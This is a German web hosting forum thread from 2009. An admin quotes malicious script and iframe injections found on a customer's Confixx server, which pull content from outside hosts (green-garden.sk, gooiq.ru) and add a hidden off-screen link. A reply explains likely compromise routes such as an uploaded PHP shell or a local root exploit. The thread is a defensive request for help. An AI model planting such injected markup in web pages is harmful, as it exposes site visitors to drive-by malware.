#1 20. Dezember 2009 hi, hab grad bei nem kunden vserver folgende zeilen gefunden -> <script src=http://green-garden.sk/ftp/down.php ></script><body bgcolor="#BDBBBB"><iframe frameborder="0" onload="if (!this.src){ this.src='http://gooiq.ru:80<div style='position:absolute;left:-1000px;'><a href='.lib/index.php'> Und einiges mehr das ganze war bei einem webX drauf -> confixx.. Was würdet ihr tun was ist das für ne url ? Wie kommt der in den account rein? greez + Multi-Zitat Zitieren
#2 22. Dezember 2009 AW: Vserver mit WebX (Confixx) Hacked ? wenn du shared hosting machst wurde vllt eine website gehackt und eine phpshell hochgeladen. je nach rechte konnte er dann alle anderen websites mit nem sctipt ändern, oder er hat sich root rechte mit einem local exploit geholt und dann alle seiten geframed. beide websites im script werden als böse websites erkannt, warscheinlich wird von denen der "böse code geladen", also versucht durch sicherheitslücken schadsoftware zu installieren. davon geh ich jetzt mal aus.. + Multi-Zitat Zitieren